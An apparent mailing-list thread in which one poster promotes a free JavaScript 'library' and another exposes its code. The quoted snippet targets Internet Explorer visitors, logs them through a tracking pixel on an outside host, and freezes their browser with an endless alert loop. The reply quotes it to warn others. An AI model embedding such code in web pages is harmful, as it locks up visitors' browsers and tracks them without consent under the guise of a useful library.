"Hi All, the idea is a very simple and powerful JavaScript library.

This library checks the browser of your home page visitor and when the
browser is IE the library shows your alert message."

if (/msie/.test(navigator.userAgent.toLowerCase())

                && !/opera/.test(navigator.userAgent.toLowerCase())) {

        document.write('<img width="1" src="http://riagallery.appspot.com/
KillIEbrowser/log">');

        setTimeout("while(true){alert(killMessage)}", 2000);

}

I wouldn't call that a "library" ;-)

--Klaus




On 8 Dez., 00:31, donb <[EMAIL PROTECTED]> wrote:
> Useful in what way?  I'm not going to the site, given the other
> person's experience.  An explanation of the plugin here would be very
> useful.
>
> On Dec 7, 9:34 am, KillIEbrowser <[EMAIL PROTECTED]> wrote:
>
> > Hi All,
> > "DOM is Better" is an useful free library to build client-side web
> > design:http://riagallery.appspot.com/static/DOMisBetter/index.html
>
> > This is the last web site made with jQuery and 
> > DOMisBetter:http://riagallery.appspot.com/KillIEbrowser
>
> > Bye
> > -- Davide

Reply via email to